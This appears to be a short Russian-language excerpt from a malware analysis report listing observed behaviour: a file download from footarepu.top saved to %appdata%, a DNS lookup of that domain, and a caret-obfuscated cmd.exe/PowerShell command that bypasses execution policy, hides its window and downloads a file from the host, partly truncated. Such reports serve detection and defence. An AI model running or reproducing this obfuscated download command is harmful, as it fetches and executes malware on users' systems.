Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^wE^rsheLl.^E^X^E^ -^EXe^c^U^t^ioN^po^licY^ B^Y^p^aSS -nopr^oF^ILe -^wind^o^w^S^TyL^E^ H^i^Dde^N (ne^W^-ob^J^Ect S^yS^T^Em.nET.We^Bc^LiEn^T).dO^Wn^lo^ad^Fi^l^e^(^'http://footare...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "Po^wE^rsheLl.^E^X^E^ -^EXe^c^U^t^ioN^po^licY^ B^Y^p^aSS -nopr^oF^ILe -^wind^o^w^S^TyL^E^ H^i^Dde^N (ne^W^-ob^J^Ect S^yS^T^Em.nET.We^Bc^LiEn^T).dO^Wn^lo^ad^Fi^l^e^(^'http://footare...' (со скрытым окном)